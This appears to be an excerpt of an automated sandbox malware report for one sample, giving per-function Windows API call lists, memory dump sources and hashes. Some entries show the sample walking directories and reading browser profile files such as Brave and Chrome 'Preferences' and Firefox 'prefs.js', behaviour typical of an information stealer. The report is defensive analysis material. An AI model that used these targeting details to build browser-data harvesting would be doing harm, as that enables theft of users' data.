                                                                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                    • API String ID: 1125553467-817767981
                                                                                    • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                                                    • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                    • API String ID: 3334442632-726946144
                                                                                    • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                    • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                                                    • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                    • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 0041492C
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    • API String ID: 180737720-445461498
                                                                                    • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                    • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                                                    • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                    • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
APIs
• wsprintfA.USER32 ref: 02D23B33
• FindFirstFileA.KERNEL32(?,?), ref: 02D23B4A
• lstrcat.KERNEL32(?,?), ref: 02D23B9C
• StrCmpCA.SHLWAPI(?,00420F70), ref: 02D23BAE
• StrCmpCA.SHLWAPI(?,00420F74), ref: 02D23BC4
• FindNextFileA.KERNEL32(000000FF,?), ref: 02D23ECE
• FindClose.KERNEL32(000000FF), ref: 02D23EE3
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextlstrcatwsprintf
• String ID:
• API String ID: 1125553467-0
• Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
• Instruction ID: da3345c658696dc960ed803474ad9b59b03e09f7687d347e1d0c588f20f2f450
• Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
• Instruction Fuzzy Hash: DBA16FB5A40218ABDB74DFA4DC84FEE737AFF59304F044588A60D96240DB759B88CF62
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
• HeapAlloc.KERNEL32(00000000), ref: 00414587
• wsprintfA.USER32 ref: 004145A6
• FindFirstFileA.KERNEL32(?,?), ref: 004145BD
• StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
• StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
• FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
• FindClose.KERNEL32(000000FF), ref: 004146A0
• lstrcatA.KERNEL32(?,02E35C40,?,00000104), ref: 004146C5
• lstrcatA.KERNEL32(?,02E3A410), ref: 004146D8
• lstrlenA.KERNEL32(?), ref: 004146E5
• lstrlenA.KERNEL32(?), ref: 004146F6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
• String ID: %s\%s$%s\*
• API String ID: 13328894-2848263008
• Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
• Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
• Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
• Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
APIs
• wsprintfA.USER32 ref: 02D24B93
• FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
• StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
• StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
• FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
• FindClose.KERNEL32(000000FF), ref: 02D24DF9
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID:
• API String ID: 180737720-0
• Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
• Instruction ID: e47528a8e7cefca33b58767a8586ad28846c411ba6a35f1ddb9bd2f4ac75c37a
• Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
• Instruction Fuzzy Hash: 8B6164B6940218BBCB24EBE0DD44FEA73BDFF59700F444588A60992140EB75AB49CFA1
APIs
  • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
  • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
  • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
  • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
  • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
  • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
  • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
• FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 02D1C15C
• StrCmpCA.SHLWAPI(?,004213F8), ref: 02D1C1B4
• StrCmpCA.SHLWAPI(?,004213FC), ref: 02D1C1CA
• FindNextFileA.KERNEL32(000000FF,?), ref: 02D1CA26
• FindClose.KERNEL32(000000FF), ref: 02D1CA38
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
• String ID:
• API String ID: 3334442632-0
• Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
• Instruction ID: f9f95880bfd2bdb402b7e391b532c307f618052ff39f10be8c3d6b202444640c
• Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
• Instruction Fuzzy Hash: B1422072910124EBCF14FBA0DD95EED737AEFA4704F404169A50AA6690EE349F4CCFA1
APIs
• wsprintfA.USER32 ref: 00413EC3
• FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
• FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
• FindClose.KERNEL32(000000FF), ref: 00414081
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\%s
• API String ID: 180737720-4073750446
• Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
• Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
• Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
• Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D247E7
• RtlAllocateHeap.NTDLL(00000000), ref: 02D247EE
• wsprintfA.USER32 ref: 02D2480D
• FindFirstFileA.KERNEL32(?,?), ref: 02D24824
• StrCmpCA.SHLWAPI(?,00420FC4), ref: 02D24852
• StrCmpCA.SHLWAPI(?,00420FC8), ref: 02D24868
• FindNextFileA.KERNEL32(000000FF,?), ref: 02D248F2
• FindClose.KERNEL32(000000FF), ref: 02D24907
• lstrcat.KERNEL32(?,0064A524), ref: 02D2492C
• lstrcat.KERNEL32(?,0064A22C), ref: 02D2493F
• lstrlen.KERNEL32(?), ref: 02D2494C
• lstrlen.KERNEL32(?), ref: 02D2495D
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
• String ID:
• API String ID: 671575355-0
• Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
• Instruction ID: c28f25d971c7b2b6c439473762ef40418922052af9e561dd56ed6b5d7b35088d
• Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
• Instruction Fuzzy Hash: AE5166B9550218ABC724EBB0DD88FED737DEF68700F404588A64996290DB74DB89CFA1
APIs
• wsprintfA.USER32 ref: 02D2412A
• FindFirstFileA.KERNEL32(?,?), ref: 02D24141
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 02D2416F
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 02D24185
• FindNextFileA.KERNEL32(000000FF,?), ref: 02D242D3
• FindClose.KERNEL32(000000FF), ref: 02D242E8
Memory Dump Source
• Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID:
• API String ID: 180737720-0
• Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
• Instruction ID: 0a1f56b13a10ba51689d21a6f61a96bbbf138a3a68440043282f0633e8b2c6a3
• Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
• Instruction Fuzzy Hash: 5A5140B5940228BBCB24EBB0DD85EEA737DFB54304F40458CB64992140DB75DB89CFA5
APIs
• wsprintfA.USER32 ref: 0040ED3E
• FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
• StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
• StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
• FindClose.KERNEL32(000000FF), ref: 0040F2C3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\*.*
• API String ID: 180737720-1013718255
• Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
• Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
• Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
• Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
• StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
• StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
• FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
• FindClose.KERNEL32(000000FF), ref: 0040E3F2
Strings
Memory Dump Source
• Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
Yara matches
Similarity
• API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
• String ID: 4@$\*.*
• API String ID: 2325840235-1993203227
• Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
• Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
• Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
• Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 3334442632-3783873740
                                                                                    • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                    • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                                                    • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                    • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1415058207-1173974218
                                                                                    • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                    • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                                                    • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                    • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 02D1EFA5
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D1EFBC
                                                                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 02D1F012
                                                                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 02D1F028
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1F515
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1F52A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 180737720-0
                                                                                    • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                    • Instruction ID: eacc1ef12e4842d4242f22260742553279875a37b1cbd44ac00ee720a6f287ba
                                                                                    • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                    • Instruction Fuzzy Hash: EAE1CE71911228EADB58EB60DD50EEE733AEF64704F4041D9A50A62591EF306F8DCF61
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 02D1DD52
                                                                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 02D1DD9A
                                                                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 02D1DDB0
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1E033
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1E045
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                    • Instruction ID: 3bcfb3ed79e880f07c006f19805891beee7c562dd372df7fd577a2bd8fd1e14c
                                                                                    • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                    • Instruction Fuzzy Hash: 4A912272900224EBCB14FBB0ED55AED737AEFA5304F404568A94A96640EF349F5CCFA1
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
